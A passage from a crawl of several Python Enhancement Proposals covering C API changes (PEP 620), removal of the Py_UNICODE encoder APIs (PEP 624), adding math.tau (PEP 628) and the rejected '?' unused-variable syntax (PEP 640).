like PyListObject cannot even be considered.
The PyTypeObject structure is the one which evolved the most, simply
because there was no other way to evolve CPython than modifying it.
A C extension can technically dereference a PyObject* pointer and
access PyObject members. This prevents experiments like tagged
pointers (storing small values as PyObject* which does not point to
a valid PyObject structure).
Replacing the Python garbage collector with a tracing garbage collector
would also require removing the PyObject.ob_refcnt reference counter,
whereas currently the Py_INCREF() and Py_DECREF() macros access
PyObject.ob_refcnt directly.
Same CPython design since 1990: structures and reference counting
When the CPython project was created, it was written with one principle:
keep the implementation simple enough so it can be maintained by a
single developer. CPython complexity grew a lot and many
micro-optimizations have been implemented, but CPython core design has
not changed.
Members of PyObject and PyTupleObject structures have not
changed since the “Initial revision” commit (1990):
#define OB_HEAD \
    unsigned int ob_refcnt; \
    struct _typeobject *ob_type;

typedef struct _object {
    OB_HEAD
} object;

typedef struct {
    OB_VARHEAD
    object *ob_item[1];
} tupleobject;
Only names changed: object was renamed to PyObject and
tupleobject was renamed to PyTupleObject.
CPython still tracks Python objects lifetime using reference counting
internally and for third party C extensions (through the Python C API).
All Python objects must be allocated on the heap and cannot be moved.
Why is PyPy more efficient than CPython?
The PyPy project is a Python implementation which is 4.2x faster than
CPython on average. PyPy developers chose to not fork CPython, but start
from scratch to have more freedom in terms of optimization choices.
PyPy does not use reference counting, but a tracing garbage collector
which moves objects. Objects can be allocated on the stack (or even not
at all), rather than always having to be allocated on the heap.
Objects layouts are designed with performance in mind. For example, a
list strategy stores integers directly as integers, rather than objects.
Moreover, PyPy also has a JIT compiler which emits fast code thanks to
the efficient PyPy design.
PyPy bottleneck: the Python C API
While PyPy is far more efficient than CPython at running pure Python code,
it is only as efficient as, or slower than, CPython at running C extensions.
Since the C API requires PyObject* and allows direct access to
structure members, PyPy has to associate a CPython object with each PyPy
object and keep both consistent. Converting a PyPy object to a
CPython object is inefficient. Moreover, reference counting also has to
be implemented on top of PyPy’s tracing garbage collector.
These conversions are required because the Python C API is too close to
the CPython implementation: there is no high-level abstraction.
For example, structure members are part of the public C API and nothing
prevents a C extension from directly getting or setting
PyTupleObject.ob_item[0] (the first item of a tuple).
See Inside cpyext: Why emulating CPython C API is so Hard
(Sept 2018) by Antonio Cuni for more details.
Rationale
Hide implementation details
Hiding implementation details from the C API has multiple advantages:
It becomes possible to experiment with more advanced optimizations in
CPython than just micro-optimizations: for example, tagged pointers,
or replacing the garbage collector with a tracing garbage collector
which can move objects.
Adding new features in CPython becomes easier.
PyPy should be able to avoid conversions to CPython objects in more
cases: keep efficient PyPy objects.
It becomes easier to implement the C API for a new Python
implementation.
More C extensions will be compatible with Python implementations other
than CPython.
Relationship with the limited C API
PEP 384 “Defining a Stable ABI” was implemented in Python 3.4. It introduces the
“limited C API”: a subset of the C API. When the limited C API is used,
it becomes possible to build a C extension only once and use it on
multiple Python versions: that’s the stable ABI.
The main limitation of PEP 384 is that C extensions have to opt in
to the limited C API. Only very few projects have made this choice,
usually to ease distribution of binaries, especially on Windows.
This PEP moves the C API towards the limited C API.
Ideally, the C API will become the limited C API and all C extensions
will use the stable ABI, but this is out of this PEP’s scope.
Specification
Summary
(Completed) Reorganize the C API header files: create Include/cpython/ and
Include/internal/ subdirectories.
(Completed) Move private functions exposing implementation details to the internal
C API.
(Completed) Convert macros to static inline functions.
(Completed) Add new functions Py_SET_TYPE(), Py_SET_REFCNT() and
Py_SET_SIZE(). The Py_TYPE(), Py_REFCNT() and
Py_SIZE() macros become functions which cannot be used as l-value.
(Completed) New C API functions must not return borrowed
references.
(In Progress) Provide pythoncapi_compat.h header file.
(In Progress) Make structures opaque, add getter and setter
functions.
(Not Started) Deprecate PySequence_Fast_ITEMS().
(Not Started) Convert PyTuple_GET_ITEM() and
PyList_GET_ITEM() macros to static inline functions.
Reorganize the C API header files
The first consumer of the C API was Python itself. There is no clear
separation between APIs which must not be used outside Python and APIs
which are public on purpose.
Header files must be reorganized into 3 APIs:
Include/ directory is the limited C API: no implementation
details, structures are opaque. C extensions using it get a stable
ABI.
Include/cpython/ directory is the CPython C API: a less “portable”
API, which depends more on the Python version and exposes some implementation
details; a few incompatible changes can happen.
Include/internal/ directory is the internal C API: implementation
details, incompatible changes are likely at each Python release.
The creation of the Include/cpython/ directory is fully backward
compatible. Include/cpython/ header files cannot be included
directly and are included automatically by Include/ header files
when the Py_LIMITED_API macro is not defined.
The internal C API is installed and can be used for specific purposes like
debuggers and profilers which must access structure members without
executing code. C extensions using the internal C API are tightly
coupled to a Python version and must be recompiled for each Python
version.
STATUS: Completed (in Python 3.8)
The reorganization of header files started in Python 3.7 and was
completed in Python 3.8:
bpo-35134: Add a new
Include/cpython/ subdirectory for the “CPython API” with
implementation details.
bpo-35081: Move internal
headers to Include/internal/
Move private functions to the internal C API
Private functions which expose implementation details must be moved to
the internal C API.
If a C extension relies on a CPython private function which exposes
CPython implementation details, other Python implementations have to
re-implement this private function to support this C extension.
STATUS: Completed (in Python 3.9)
Private functions moved to the internal C API in Python 3.8:
_PyObject_GC_TRACK(), _PyObject_GC_UNTRACK()
Macros and functions excluded from the limited C API in Python 3.9:
_PyObject_SIZE(), _PyObject_VAR_SIZE()
PyThreadState_DeleteCurrent()
PyFPE_START_PROTECT(), PyFPE_END_PROTECT()
_Py_NewReference(), _Py_ForgetReference()
_PyTraceMalloc_NewReference()
_Py_GetRefTotal()
Private functions moved to the internal C API in Python 3.9:
GC functions like _Py_AS_GC(), _PyObject_GC_IS_TRACKED()
and _PyGCHead_NEXT()
_Py_AddToAllObjects() (not exported)
_PyDebug_PrintTotalRefs(), _Py_PrintReferences(),
_Py_PrintReferenceAddresses() (not exported)
Public “clear free list” functions moved to the internal C API and
renamed to private functions in Python 3.9:
PyAsyncGen_ClearFreeLists()
PyContext_ClearFreeList()
PyDict_ClearFreeList()
PyFloat_ClearFreeList()
PyFrame_ClearFreeList()
PyList_ClearFreeList()
PyTuple_ClearFreeList()
Functions simply removed:
PyMethod_ClearFreeList() and PyCFunction_ClearFreeList():
bound method free list removed in Python 3.9.
PySet_ClearFreeList(): set free list removed in Python 3.4.
PyUnicode_ClearFreeList(): Unicode free list removed
in Python 3.3.
Convert macros to static inline functions
Converting macros to static inline functions has multiple advantages:
Functions have well defined parameter types and return type.
Functions can use variables with a well defined scope (the function).
Debuggers can put breakpoints on functions and profilers can display
the function name in call stacks. In most cases, this works even
when a static inline function is inlined.
Functions don’t have macro pitfalls.
Converting macros to static inline functions should only impact very few
C extensions that use macros in unusual ways.
For backward compatibility, functions must continue to accept any type,
not only PyObject*, to avoid compiler warnings, since most macros
cast their parameters to PyObject*.
Python 3.6 requires C compilers to support static inline functions: the
PEP 7 requires a subset of C99.
STATUS: Completed (in Python 3.9)
Macros converted to static inline functions in Python 3.8:
Py_INCREF(), Py_DECREF()
Py_XINCREF(), Py_XDECREF()
PyObject_INIT(), PyObject_INIT_VAR()
_PyObject_GC_TRACK(), _PyObject_GC_UNTRACK(), _Py_Dealloc()
Macros converted to regular functions in Python 3.9:
Py_EnterRecursiveCall(), Py_LeaveRecursiveCall()
(added to the limited C API)
PyObject_INIT(), PyObject_INIT_VAR()
PyObject_GET_WEAKREFS_LISTPTR()
PyObject_CheckBuffer()
PyIndex_Check()
PyObject_IS_GC()
PyObject_NEW() (alias to PyObject_New()),
PyObject_NEW_VAR() (alias to PyObject_NewVar())
PyType_HasFeature() (always calls PyType_GetFlags())
Py_TRASHCAN_BEGIN_CONDITION() and Py_TRASHCAN_END() macros
now call functions which hide implementation details, rather than
accessing directly members of the PyThreadState structure.
Make structures opaque
The following structures of the C API become opaque:
PyInterpreterState
PyThreadState
PyGC_Head
PyTypeObject
PyObject and PyVarObject
All types which inherit from PyObject or PyVarObject
C extensions must use getter or setter functions to get or set structure
members. For example, tuple->ob_item[0] must be replaced with
PyTuple_GET_ITEM(tuple, 0).
To be able to move away from reference counting, PyObject must
become opaque. Currently, the reference counter PyObject.ob_refcnt
is exposed in the C API. All structures must become opaque, since they
“inherit” from PyObject. For example, PyFloatObject inherits from
PyObject:
typedef struct {
    PyObject ob_base;
    double ob_fval;
} PyFloatObject;
Making PyObject fully opaque requires converting Py_INCREF() and
Py_DECREF() macros to function calls. This change has an impact on
performance. It is likely to be one of the very last changes when making
structures opaque.
Making PyTypeObject structure opaque breaks C extensions declaring
types statically (e.g. static PyTypeObject MyType = {...};). C
extensions must use PyType_FromSpec() to allocate types on the heap
instead. Using heap types has other advantages like being compatible
with subinterpreters. Combined with PEP 489 “Multi-phase extension
module initialization”, it makes a C extension’s behavior closer to that of a
Python module, for example by allowing more than one module instance to be created.
Making PyThreadState structure opaque requires adding getter and
setter functions for members used by C extensions.
STATUS: In Progress (started in Python 3.8)
The PyInterpreterState structure was made opaque in Python 3.8
(bpo-35886) and the
PyGC_Head structure (bpo-40241) was made opaque in Python 3.9.
Issues tracking the work to prepare the C API to make following
structures opaque:
PyObject: bpo-39573
PyTypeObject: bpo-40170
PyFrameObject: bpo-40421
Python 3.9 adds PyFrame_GetCode() and PyFrame_GetBack()
getter functions, and moves PyFrame_GetLineNumber to the limited
C API.
PyThreadState: bpo-39947
Python 3.9 adds 3 getter functions: PyThreadState_GetFrame(),
PyThreadState_GetID(), PyThreadState_GetInterpreter().
Disallow using Py_TYPE() as l-value
The Py_TYPE() function gets an object’s type, its PyObject.ob_type
member. It is implemented as a macro which can be used as an l-value to
set the type: Py_TYPE(obj) = new_type. This code relies on the
assumption that PyObject.ob_type can be modified directly. It
prevents making the PyObject structure opaque.
New setter functions Py_SET_TYPE(), Py_SET_REFCNT() and
Py_SET_SIZE() are added and must be used instead.
The Py_TYPE(), Py_REFCNT() and Py_SIZE() macros must be
converted to static inline functions which cannot be used as l-values.
For example, the Py_TYPE() macro:
#define Py_TYPE(ob) (((PyObject*)(ob))->ob_type)
becomes:
#define _PyObject_CAST_CONST(op) ((const PyObject*)(op))

static inline PyTypeObject* _Py_TYPE(const PyObject *ob) {
    return ob->ob_type;
}

#define Py_TYPE(ob) _Py_TYPE(_PyObject_CAST_CONST(ob))
STATUS: Completed (in Python 3.10)
New functions Py_SET_TYPE(), Py_SET_REFCNT() and
Py_SET_SIZE() were added to Python 3.9.
In Python 3.10, Py_TYPE(), Py_REFCNT() and Py_SIZE() can no
longer be used as l-value and the new setter functions must be used
instead.
New C API functions must not return borrowed references
When a function returns a borrowed reference, Python cannot track when
the caller stops using this reference.
For example, if the Python list type were specialized for small
integers, storing “raw” numbers directly rather than Python objects,
PyList_GetItem() would have to create a temporary Python object. The
problem is to decide when it is safe to delete the temporary object.
The general guideline is to avoid returning borrowed references from new
C API functions.
No function returning borrowed references is scheduled for removal by
this PEP.
STATUS: Completed (in Python 3.9)
In Python 3.9, new C API functions returning Python objects only return
strong references:
PyFrame_GetBack()
PyFrame_GetCode()
PyObject_CallNoArgs()
PyObject_CallOneArg()
PyThreadState_GetFrame()
Avoid functions returning PyObject**
The PySequence_Fast_ITEMS() function gives direct access to an
array of PyObject* objects. The function is deprecated in favor of
PyTuple_GetItem() and PyList_GetItem().
PyTuple_GET_ITEM() can be abused to access directly the
PyTupleObject.ob_item member:
PyObject **items = &PyTuple_GET_ITEM(tuple, 0);
The PyTuple_GET_ITEM() and PyList_GET_ITEM() macros are
converted to static inline functions to disallow that.
STATUS: Not Started
New pythoncapi_compat.h header file
Making structures opaque requires modifying C extensions to
use getter and setter functions. The practical issue is how to keep
support for old Python versions which don’t have these functions.
For example, in Python 3.10, it is no longer possible to use
Py_TYPE() as an l-value. The new Py_SET_TYPE() function must be
used instead:
#if PY_VERSION_HEX >= 0x030900A4
    Py_SET_TYPE(&MyType, &PyType_Type);
#else
    Py_TYPE(&MyType) = &PyType_Type;
#endif
This code may ring a bell to developers who ported their Python code
base from Python 2 to Python 3.
Python will distribute a new pythoncapi_compat.h header file which
provides new C API functions to old Python versions. Example:
#if PY_VERSION_HEX < 0x030900A4
static inline void
_Py_SET_TYPE(PyObject *ob, PyTypeObject *type)
{
    ob->ob_type = type;
}
#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type)
#endif  // PY_VERSION_HEX < 0x030900A4
Using this header file, Py_SET_TYPE() can be used on old Python
versions as well.
Developers can copy this file into their project, or even copy/paste
only the few functions needed by their C extension.
STATUS: In Progress (implemented but not distributed by CPython yet)
The pythoncapi_compat.h header file is currently developed at:
https://github.com/pythoncapi/pythoncapi_compat
Process to reduce the number of broken C extensions
Process to reduce the number of broken C extensions when introducing C
API incompatible changes listed in this PEP:
Estimate how many popular C extensions are affected by the
incompatible change.
Coordinate with maintainers of broken C extensions to prepare their
code for the future incompatible change.
Introduce the incompatible changes in Python. The documentation must
explain how to port existing code. It is recommended to merge such
changes at the beginning of a development cycle to have more time for
tests.
Changes which are the most likely to break a large number of C
extensions should be announced on the capi-sig mailing list to notify
C extensions maintainers to prepare their project for the next Python.
If the change breaks too many projects, reverting the change should be
discussed, taking into account the number of broken packages, their
importance in the Python community, and the importance of the change.
The coordination usually means reporting issues to the projects, or even
proposing changes. It does not require waiting for a new release including
fixes for every broken project.
Since more and more C extensions are written using Cython, rather than
directly using the C API, it is important to ensure that Cython is
prepared in advance for incompatible changes. This gives more time for C
extension maintainers to release a new version with code generated with
the updated Cython (for C extensions distributing the code generated by
Cython).
Future incompatible changes can be announced by deprecating a function
in the documentation and by annotating the function with
Py_DEPRECATED(). But making a structure opaque and preventing the
usage of a macro as l-value cannot be deprecated with
Py_DEPRECATED().
The important part is coordination and finding a balance between CPython
evolutions and backward compatibility. For example, breaking a random,
old, obscure and unmaintained C extension on PyPI is less severe than
breaking numpy.
If a change is reverted, we move back to the coordination step to better
prepare the change. Once more C extensions are ready, the incompatible
change can be reconsidered.
Version History
Version 3, June 2020: PEP rewritten from scratch. Python now
distributes a new pythoncapi_compat.h header and a process is
defined to reduce the number of broken C extensions when introducing C
API incompatible changes listed in this PEP.
Version 2, April 2020:
PEP: Modify the C API to hide implementation details.
Version 1, July 2017:
PEP: Hide implementation details in the C API
sent to python-ideas
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 620 – Hide implementation details from the C API | Standards Track | Introduce C API incompatible changes to hide implementation details. |
PEP 624 – Remove Py_UNICODE encoder APIs
Author:
Inada Naoki <songofacandy at gmail.com>
Status:
Final
Type:
Standards Track
Created:
06-Jul-2020
Python-Version:
3.11
Post-History:
08-Jul-2020
Table of Contents
Abstract
Motivation
Rationale
Deprecated since Python 3.3
Inefficient
Not used widely
Alternative APIs
Plan
Alternative Ideas
Replace Py_UNICODE* with PyObject*
Replace Py_UNICODE* with Py_UCS4*
Replace Py_UNICODE* with wchar_t*
Rejected Ideas
Emit runtime warning
Discussions
Objections
References
Copyright
Abstract
This PEP proposes to remove deprecated Py_UNICODE encoder APIs in Python 3.11:
PyUnicode_Encode()
PyUnicode_EncodeASCII()
PyUnicode_EncodeLatin1()
PyUnicode_EncodeUTF7()
PyUnicode_EncodeUTF8()
PyUnicode_EncodeUTF16()
PyUnicode_EncodeUTF32()
PyUnicode_EncodeUnicodeEscape()
PyUnicode_EncodeRawUnicodeEscape()
PyUnicode_EncodeCharmap()
PyUnicode_TranslateCharmap()
PyUnicode_EncodeDecimal()
PyUnicode_TransformDecimalToASCII()
Note
PEP 623 proposes to remove
Unicode object APIs relating to Py_UNICODE. This PEP, on the other hand,
does not relate to the Unicode object itself. These PEPs are split because they have
different motivations and need different discussions.
Motivation
In general, reducing the number of APIs that have been deprecated for
a long time and have few users is a good idea: not only does it
improve the maintainability of CPython, it also helps API users
and other Python implementations.
Rationale
Deprecated since Python 3.3
Py_UNICODE and the APIs using it have been deprecated since Python 3.3.
Inefficient
All of these APIs are implemented using PyUnicode_FromWideChar,
so they are inefficient when the user wants to encode a Unicode
object.
Not used widely
When searching the top 4000 PyPI packages [1], only pyodbc uses
these APIs:
PyUnicode_EncodeUTF8()
PyUnicode_EncodeUTF16()
pyodbc uses these APIs to encode a Unicode object into a bytes object,
so it is easy to fix. [2]
Alternative APIs
There are alternative APIs that accept PyObject *unicode instead of
Py_UNICODE*. Users can migrate to them:
Deprecated API                         Alternative API
PyUnicode_Encode()                     PyUnicode_AsEncodedString()
PyUnicode_EncodeASCII()                PyUnicode_AsASCIIString() (1)
PyUnicode_EncodeLatin1()               PyUnicode_AsLatin1String() (1)
PyUnicode_EncodeUTF7()                 (2)
PyUnicode_EncodeUTF8()                 PyUnicode_AsUTF8String() (1)
PyUnicode_EncodeUTF16()                PyUnicode_AsUTF16String() (3)
PyUnicode_EncodeUTF32()                PyUnicode_AsUTF32String() (3)
PyUnicode_EncodeUnicodeEscape()        PyUnicode_AsUnicodeEscapeString()
PyUnicode_EncodeRawUnicodeEscape()     PyUnicode_AsRawUnicodeEscapeString()
PyUnicode_EncodeCharmap()              PyUnicode_AsCharmapString() (1)
PyUnicode_TranslateCharmap()           PyUnicode_Translate()
PyUnicode_EncodeDecimal()              (4)
PyUnicode_TransformDecimalToASCII()    (4)
Notes:
(1) The const char *errors parameter is missing.
(2) There is no public alternative API, but the generic
PyUnicode_AsEncodedString() can be used instead.
(3) The const char *errors and int byteorder parameters are missing.
(4) There is no direct replacement, but Py_UNICODE_TODECIMAL
can be used instead. CPython uses
_PyUnicode_TransformDecimalAndSpaceToASCII for converting
from Unicode to numbers instead.
Plan
Remove these APIs in Python 3.11. They have been deprecated already.
PyUnicode_Encode()
PyUnicode_EncodeASCII()
PyUnicode_EncodeLatin1()
PyUnicode_EncodeUTF7()
PyUnicode_EncodeUTF8()
PyUnicode_EncodeUTF16()
PyUnicode_EncodeUTF32()
PyUnicode_EncodeUnicodeEscape()
PyUnicode_EncodeRawUnicodeEscape()
PyUnicode_EncodeCharmap()
PyUnicode_TranslateCharmap()
PyUnicode_EncodeDecimal()
PyUnicode_TransformDecimalToASCII()
Alternative Ideas
Replace Py_UNICODE* with PyObject*
As described in the “Alternative APIs” section, some APIs don’t have
public alternative APIs accepting PyObject *unicode input.
And some public alternative APIs have restrictions like missing
errors and byteorder parameters.
Instead of removing the deprecated APIs, we could reuse their names for
alternative public APIs.
Since we already have private alternative APIs, this is just a matter of
renaming them from their private names to the public, currently deprecated names:
Rename to                  Rename from
PyUnicode_EncodeASCII()    _PyUnicode_AsASCIIString()
PyUnicode_EncodeLatin1()   _PyUnicode_AsLatin1String()
PyUnicode_EncodeUTF7()     _PyUnicode_EncodeUTF7()
PyUnicode_EncodeUTF8()     _PyUnicode_AsUTF8String()
PyUnicode_EncodeUTF16()    _PyUnicode_EncodeUTF16()
PyUnicode_EncodeUTF32()    _PyUnicode_EncodeUTF32()
Pros:
We have a more consistent API set.
Cons:
Backward incompatible.
We have more public APIs to maintain for rare use cases.
Existing public APIs are enough for most use cases, and
PyUnicode_AsEncodedString() can be used in other cases.
Replace Py_UNICODE* with Py_UCS4*
We can replace Py_UNICODE with Py_UCS4 and undeprecate
these APIs.
The UTF-8, UTF-16, and UTF-32 encoders support Py_UCS4 internally,
so PyUnicode_EncodeUTF8(), PyUnicode_EncodeUTF16(), and
PyUnicode_EncodeUTF32() could avoid creating a temporary Unicode
object.
Pros:
We can avoid creating a temporary Unicode object when encoding from
Py_UCS4* into a bytes object with the UTF-8, UTF-16, and UTF-32 codecs.
Cons:
Backward incompatible.
We have more public APIs to maintain for rare use cases.
Other Python implementations that want to support Python/C API need
to support these APIs too.
If we change the Unicode internal representation to UTF-8 in the
future, we need to keep UCS-4 support only for these APIs.
Replace Py_UNICODE* with wchar_t*
We can replace Py_UNICODE with wchar_t. Since Py_UNICODE
is already a typedef of wchar_t, this is the status quo.
On platforms where sizeof(wchar_t) == 4, we can avoid creating a
temporary Unicode object when encoding from wchar_t* to bytes
objects using the UTF-8, UTF-16, and UTF-32 codecs, like the “Replace
Py_UNICODE* with Py_UCS4*” idea.
Pros:
Backward compatible.
We can avoid creating a temporary Unicode object when encoding from
wchar_t* into a bytes object with the UTF-8, UTF-16, and UTF-32 codecs
on platforms where sizeof(wchar_t) == 4.
Cons:
Although Windows is the major platform that uses wchar_t
heavily, these APIs would always need to create a temporary Unicode object
there, because sizeof(wchar_t) == 2 on Windows.
We have more public APIs to maintain for rare use cases.
Other Python implementations that want to support Python/C API need
to support these APIs too.
If we change the Unicode internal representation to UTF-8 in the
future, we need to keep UCS-4 support only for these APIs.
Rejected Ideas
Emit runtime warning
In addition to the existing compiler warning, emitting a runtime
DeprecationWarning was suggested.
But these APIs don’t release the GIL for now, so emitting a warning from
such APIs is not safe. See this example:
PyObject *u = PyList_GET_ITEM(list, i); // u is borrowed reference.
PyObject *b = PyUnicode_EncodeUTF8(PyUnicode_AS_UNICODE(u),
PyUnicode_GET_SIZE(u), NULL);
// Assumes u is still living reference.
PyObject *t = PyTuple_Pack(2, u, b);
Py_DECREF(b);
return t;
If we emit a Python warning from PyUnicode_EncodeUTF8(), warning
filters and other threads may change the list, and u can be
a dangling reference after PyUnicode_EncodeUTF8() returns.
Discussions
[python-dev] Plan to remove Py_UNICODE APis except PEP 623
bpo-41123: Remove Py_UNICODE APIs except PEP 623
[python-dev] PEP 624: Remove Py_UNICODE encoder APIs
Objections
Removing these APIs removes the ability to use a codec without a temporary
Unicode object.
Codecs have not been able to encode a Unicode buffer directly without a temporary
Unicode object since Python 3.3. All these APIs create a temporary
Unicode object for now, so removing them doesn’t remove any
capability.
Why not remove decoder APIs too?
They are part of the stable ABI.
PyUnicode_DecodeASCII() and PyUnicode_DecodeUTF8() are
used very widely; deprecating them is not worthwhile.
Decoder APIs can decode from a byte buffer directly, without
creating a temporary bytes object. On the other hand, encoder APIs
cannot avoid a temporary Unicode object.
References
[1]
Source package list chosen from top 4000 PyPI packages.
(https://github.com/methane/notes/blob/master/2020/wchar-cache/package_list.txt)
[2]
pyodbc – Don’t use PyUnicode_Encode API #792
(https://github.com/mkleehammer/pyodbc/pull/792)
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Final | PEP 624 – Remove Py_UNICODE encoder APIs | Standards Track | This PEP proposes to remove deprecated Py_UNICODE encoder APIs in Python 3.11: |
PEP 628 – Add math.tau
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Final
Type:
Standards Track
Created:
28-Jun-2011
Python-Version:
3.6
Post-History:
28-Jun-2011
Table of Contents
Abstract
PEP Acceptance
The Rationale for Tau
Other Resources
Copyright
Abstract
In honour of Tau Day 2011, this PEP proposes the addition of the circle
constant math.tau to the Python standard library.
The concept of tau (τ) is based on the observation that the ratio of a
circle’s circumference to its radius is far more fundamental and interesting
than the ratio between its circumference and diameter. It is simply a matter
of assigning a name to the value 2 * pi (2π).
PEP Acceptance
This PEP is now accepted and math.tau will be a part of Python 3.6.
Happy birthday Alyssa!
The idea in this PEP has been implemented in the auspiciously named
issue 12345.
The Rationale for Tau
pi is defined as the ratio of a circle’s circumference to its diameter.
However, a circle is defined by its centre point and its radius. This is
shown clearly when we note that the parameter of integration to go from a
circle’s circumference to its area is the radius, not the diameter. If we
use the diameter instead we have to divide by four to get rid of the
extraneous multiplier.
When working with radians, it is trivial to convert any given fraction of a
circle to a value in radians in terms of tau. A quarter circle is
tau/4, a half circle is tau/2, seven 25ths is 7*tau/25, etc. In
contrast with the equivalent expressions in terms of pi (pi/2, pi,
14*pi/25), the unnecessary and needlessly confusing multiplication by
two is gone.
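Since math.tau is simply 2 * math.pi (available since Python 3.6), the fractions above translate directly into code:

import math

quarter_turn = math.tau / 4                 # a quarter circle in radians
half_turn = math.tau / 2                    # a half circle

assert math.isclose(math.tau, 2 * math.pi)
assert math.isclose(quarter_turn, math.pi / 2)
print(math.sin(quarter_turn))               # 1.0, the sine of a quarter turn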
Other Resources
I’ve barely skimmed the surface of the many examples put forward to point out
just how much easier and more sensible many aspects of mathematics become
when conceived in terms of tau rather than pi. If you don’t find my
specific examples sufficiently persuasive, here are some more resources that
may be of interest:
Michael Hartl is the primary instigator of Tau Day in his Tau Manifesto
Bob Palais, the author of the original mathematics journal article
highlighting the problems with pi has a page of resources on the
topic
For those that prefer videos to written text, Pi is wrong! and
Pi is (still) wrong are available on YouTube
Copyright
This document has been placed in the public domain.
| Final | PEP 628 – Add math.tau | Standards Track | In honour of Tau Day 2011, this PEP proposes the addition of the circle
constant math.tau to the Python standard library. |
PEP 640 – Unused variable syntax
Author:
Thomas Wouters <thomas at python.org>
Status:
Rejected
Type:
Standards Track
Created:
04-Oct-2020
Python-Version:
3.10
Post-History:
19-Oct-2020
Resolution:
Python-Dev message
Table of Contents
Rejection Note
Abstract
Motivation
Rationale
Specification
Backwards Compatibility
How to Teach This
Reference Implementation
Rejected Ideas
Open Issues
Copyright
Rejection Note
Rejected by the Steering Council:
https://mail.python.org/archives/list/[email protected]/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/
Abstract
This PEP proposes new syntax for unused variables, providing a pseudo-name
that can be assigned to but not otherwise used. The assignment doesn’t
actually happen, and the value is discarded instead.
Motivation
In Python it is somewhat common to need to do an assignment without actually
needing the result. Conventionally, people use either "_" or a name such
as "unused" (or with "unused" as a prefix) for this. It’s most
common in unpacking assignments:
x, unused, z = range(3)
x, *unused, z = range(10)
It’s also used in for loops and comprehensions:
for unused in range(10): ...
[ SpamObject() for unused in range(10) ]
The use of "_" in these cases is probably the most common, but it
potentially conflicts with the use of "_" in internationalization, where
a call like gettext.gettext() is bound to "_" and used to mark strings
for translation.
In the proposal to add Pattern Matching to Python (originally PEP 622, now
split into PEP 634, PEP 635 and PEP 636), "_" has an additional
special meaning. It is a wildcard pattern, used in places where variables
could be assigned to, to indicate anything should be matched but not
assigned to anything. The choice of "_" there matches the use of "_"
in other languages, but the semantic difference with "_" elsewhere in
Python is significant.
This PEP proposes to allow a special token, "?", to be used instead of
any valid name in assignment. This has most of the benefits of "_"
without affecting other uses of that otherwise regular variable. Allowing
the use of the same wildcard pattern would make pattern matching and
unpacking assignment more consistent with each other.
Rationale
Marking certain variables as unused is a useful tool, as it helps clarity of
purpose of the code. It makes it obvious to readers of the code as well as
automated linters, that a particular variable is intentionally unused.
However, despite the convention, "_" is not a special variable. The
value is still assigned to, the object it refers to is still kept alive
until the end of the scope, and it can still be used. Nor is the use of
"_" for unused variables entirely ubiquitous, since it conflicts with
conventional internationalization, it isn’t obvious that it is a regular
variable, and it isn’t as obviously unused as a variable named
"unused".
In the Pattern Matching proposal, the use of "_" for wildcard patterns
side-steps the problems of "_" for unused variables by virtue of it
being in a separate scope. The only conflict it has with
internationalization is one of potential confusion, it will not actually
interact with uses of a global variable called "_". However, the
special-casing of "_" for this wildcard pattern purpose is still
problematic: the different semantics and meaning of "_" inside pattern
matching and outside of it means a break in consistency in Python.
Introducing "?" as special syntax for unused variables both inside and
outside pattern matching allows us to retain that consistency. It avoids
the conflict with internationalization or any other uses of _ as a
variable. It makes unpacking assignment align more closely with pattern
matching, making it easier to explain pattern matching as an extension of
unpacking assignment.
In terms of code readability, using a special token makes it easier to find
out what it means ("what does question mark in Python do" versus "why
is my _ variable not getting assigned to"), and makes it more obvious that
the actual intent is for the value to be unused – since it is entirely
impossible to use it.
Specification
A new token is introduced, "?", or token.QMARK.
The grammar is modified to allow "?" in assignment contexts
(star_atom and t_atom in the current grammar), creating a Name
AST node with identifier set to NULL.
The AST is modified to allow the Name expression’s identifier to be
optional (it is currently required). The identifier being empty would only
be allowed in a STORE context.
In CPython, the bytecode compiler is modified to emit POP_TOP instead of
STORE_NAME for Name nodes with no identifier. Other uses of the
Name node are updated to handle the identifier being empty, as
appropriate.
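The current behaviour this refers to can be inspected with the dis module; the POP_TOP emission for "?" is of course hypothetical, since the token does not exist in released CPython:

import dis

# Today, the throwaway name still gets a real store instruction:
dis.dis(compile("x, unused, z = range(3)", "<example>", "exec"))
# The output contains UNPACK_SEQUENCE 3 followed by a STORE_NAME for
# each of x, unused and z.  Under this PEP, "x, ?, z = range(3)" would
# emit POP_TOP in place of the STORE_NAME for the "?" slot, so no
# binding would be created.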
The uses of the modified grammar nodes encompass at least the following
forms of assignment:
? = ...
x, ?, z = ...
x, *?, z = ...
for ? in range(3): ... # including comprehension forms
for x, ?, z in matrix: ... # including comprehension forms
with open(f) as ?: ...
with func() as (x, ?, z): ...
The use of a single "?", not in an unpacking context, is allowed in
normal assignment and the with statement. It doesn’t really make sense
on its own, and it is possible to disallow those specific cases. However,
for ? in range(3) clearly has its uses, so for consistency reasons if
nothing else it seems more sensible to allow the use of the single "?"
in other cases.
Using "?" in augmented assignment (? *= 2) is not allowed, since
"?" can only be used for assignment. Having multiple occurrences of
"?" is valid, just like when assigning to names, and the assignments do
not interfere with each other.
Backwards Compatibility
Introducing a new token means there are no backward compatibility concerns.
No valid syntax changes meaning.
"?" is not considered an identifier, so str.isidentifier() does not
change.
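For example, the following holds today and would continue to hold:

print("?".isidentifier())   # False -- "?" was never a valid identifier
print("_".isidentifier())   # True  -- "_" remains an ordinary name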
The AST does change in an incompatible way, as the identifier of a Name
token can now be empty. Code using the AST will have to be adjusted
accordingly.
How to Teach This
"?" can be introduced along with unpacking assignment, explaining it is
special syntax for ‘unused’ and mentioning that it can also be used in other
places. Alternatively, it could be introduced as part of an explanation on
assignment in for loops, showing an example where the loop variable is
unused.
PEP 636 discusses how to teach "_", and can simply replace "_" with
"?", perhaps noting that "?" is similarly usable in other contexts.
Reference Implementation
A prototype implementation exists at
<https://github.com/Yhg1s/cpython/tree/nonassign>.
Rejected Ideas
Open Issues
Should "?" be allowed in the following contexts:
# imports done for side-effect only.
import os as ?
from os import path as ?
# Function defined for side-effects only (e.g. decorators)
@register_my_func
def ?(...): ...
# Class defined for side-effects only (e.g. decorators, __init_subclass__)
class ?(...): ...
# Parameters defined for unused positional-only arguments:
def f(a, ?, ?): ...
lambda a, ?, ?: ...
# Unused variables with type annotations:
?: int = f()
